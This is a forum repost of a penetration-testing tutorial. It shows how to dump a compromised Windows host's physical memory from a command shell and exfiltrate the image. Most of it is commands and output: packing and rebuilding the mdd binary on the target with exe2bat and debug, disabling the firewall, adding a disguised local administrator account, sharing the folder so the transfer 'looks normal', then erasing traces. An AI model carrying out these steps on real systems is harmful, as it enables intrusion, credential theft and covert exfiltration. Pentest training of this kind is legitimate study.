[Thanks to DarkOperator for this Article]
Since in my last post I covered how to do this in meterpreter with the
script I wrote, I decided to show how to do the same from command shell
and you will see why I love Meterpreter and scripting Meterpreter so much!!
We start by downloading mdd in to our Backtrack4 machine.
Quote:
root@bt:/pentest/windows-binaries# wget http://voxel.dl.sourceforge.net/sour...dd/mdd_1.3.exe
--2009-03-10 14:01:49-- http://voxel.dl.sourceforge.net/sour...dd/mdd_1.3.exe
Resolving voxel.dl.sourceforge.net... 72.26.194.82
Connecting to voxel.dl.sourceforge.net|72.26.194.82|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 95104 (93K) [application/octet-stream]
Saving to: `mdd_1.3.exe'
100%[================================================== ===============>] 95,104 175K/s in 0.5s
2009-03-10 14:01:49 (175 KB/s) - `mdd_1.3.exe' saved [95104/95104]
|
We will be using exe2bat.exe that is available in the /pentest/windows-
binaries/tools to be able to use this tool the executable has to be 64k or
less do to the limitations of the windows debug command. When we check
the size of the executable we can see that it is 93k of size.
Quote:
root@bt:/pentest/windows-binaries# ls -lh mdd*
-rw-r--r-- 1 root root 93K 2009-01-27 12:48 mdd_1.3.exe
|
We can compress the executable with UPX so as to be able to meet the 64k requirement, in Backtrack4 it will have to be installed using apt-get.
Quote:
root@bt:/pentest/windows-binaries# upx -2 -o mdd.exe mdd_1.3.exe
Ultimate Packer for eXecutables
Copyright (C) 1996,1997,1998,1999,2000,2001,2002,2003,2004,2005, 2006,2007
UPX 3.01 Markus Oberhumer, Laszlo Molnar & John Reiser Jul 31st 2007
File size Ratio Format Name
-------------------- ------ ----------- -----------
95104 -> 55168 58.01% win32/pe mdd.exe
Packed 1 file.
|
As you can see the executable is know 55k in size. In Backtrack 4 we use
wine to run the exe2bat.exe executable to convert the exe into a batch file
that we can paste in shell that will use debug to generate our executable
on the target host.
Quote:
root@bt:/pentest/windows-binaries/tools# wine exe2bat.exe ../mdd.exe mdd.txt
Finished: ../mdd.exe > mdd.txt
|
We take the content of the mdd.txt and paste it into our command shell,
you will see that you might get an error on the last line pasted, this is expected.
Quote:
c:\Windows\System32>copy 1.dll ../mdd.exe
The syntax of the command is incorrect.
|
The problem was the case of the dll name (first time I have ever noticed that copy is case sensitive).
Quote:
c:\Windows\System32>copy 1.dll ../mdd.exe
The syntax of the command is incorrect.
c:\Windows\System32>copy 1.DLL mdd.exe
1 file(s) copied.
c:\Windows\System32>mdd
-> mdd
-> ManTech Physical Memory Dump Utility
Copyright (C) 2008 ManTech Security & Mission Assurance
-> This program comes with ABSOLUTELY NO WARRANTY; for details use option `-w'
This is free software, and you are welcome to redistribute it
under certain conditions; use option `-c' for details.
-> ERROR: must specify output filename; use -h for usage
c:\Windows\System32>
|
We can perform a check of the size of the physical memory on the target host with systeminfo this will give us an estimate of the image file that will be generated.
Quote:
c:\Windows\System32>systeminfo | find /i "physical"
Total Physical Memory: 3,070 MB
Available Physical Memory: 859 MB
|
Now that mdd is on the target machine we can make an image of the memory, and dumping it locally.
Quote:
c:\Windows\System32>mdd.exe -o memimg.dd
-> mdd
-> ManTech Physical Memory Dump Utility
Copyright (C) 2008 ManTech Security & Mission Assurance
-> This program comes with ABSOLUTELY NO WARRANTY; for details use option `-w'
This is free software, and you are welcome to redistribute it
under certain conditions; use option `-c' for details.
-> Dumping 3070.34 MB of physical memory to file 'memimg.dd'.
773770 map operations succeeded (0.98)
12236 map operations failed
took 137 seconds to write
MD5 is: 888b9663c5d760f36f5b948ed92bef23
|
Once the image has been made we can use several methods to transfer the
image to our target machine, this may be by tfpt, scripting ftp, mounting a
share from our machine that we configured with samba or we can even
create a share of our own and connect to it. I will demonstrate the task of
creating a share since it might be the most useful when working in large
teams against a single target host and most of the steps can be of use to
others in different scenarios, we can share the folder and disable the local
built in firewall to be able to gain access to the share.
Quote:
c:\Windows\System32>net share img=c:\windows\system32
img was shared successfully.
c:\Windows\System32>netsh.exe firewall set opmode disable
Ok.
|
Before we create and account we can check the Account Security Policy
settings so as to save time by not doing trial and error on password length
while creating our account for access.
Quote:
c:\Windows\System32>net accounts
Force user logoff how long after time expires?: Never
Minimum password age (days): 0
Maximum password age (days): 455
Minimum password length: 12
Length of password history maintained: 6
Lockout threshold: 10
Lockout duration (minutes): 60
Lockout observation window (minutes): 5
Computer role: WORKSTATION
The command completed successfully.
|
Now that we know the password length we can create and account and
add it to the local Administrators we will use this account to mount the
share we created.
Quote:
c:\Windows\System32>net user /add SUPPORT_3089 P@ssword0001
The command completed successfully.
c:\Windows\System32>net localgroup Administrators /add SUPPORT_3089
The command completed successfully.
|
Next we mount the share on our machine with the smbmount command and the credential of the user we created.
Quote:
|
root@bt:/pentest/windows-binaries/tools# smbmount //192.168.1.192/img /mnt/img -o user=SUPPORT_3089,pass=P@ssword0001
|
Now that we have mounted the share we can copy over the file, this will
look for anyone looking like a normal file transfer. As you will can see the
image size is of 3GB.
Quote:
root@bt:/mnt/img# ls -lh memimg.dd
-rwxrwSrwx 1 root root 3.0G 2009-03-10 14:50 memimg.dd
|
Once we have copied over the image we must perform clean up of everything we did on the target host.
Quote:
c:\Windows\System32>del memimg.dd
c:\Windows\System32>del mdd.exe
c:\Windows\System32>net share /del img
img was deleted successfully.
c:\Windows\System32>net user /del SUPPORT_3089
The command completed successfully.
c:\Windows\System32>netsh firewall set opmode enable
Ok.
|
I hope you have found this post of great use and please do share opinions and ideas.
» Dumping Memory thru Command Shell
17th March 2009, 18:13
Similar Threads 
Linear Mode
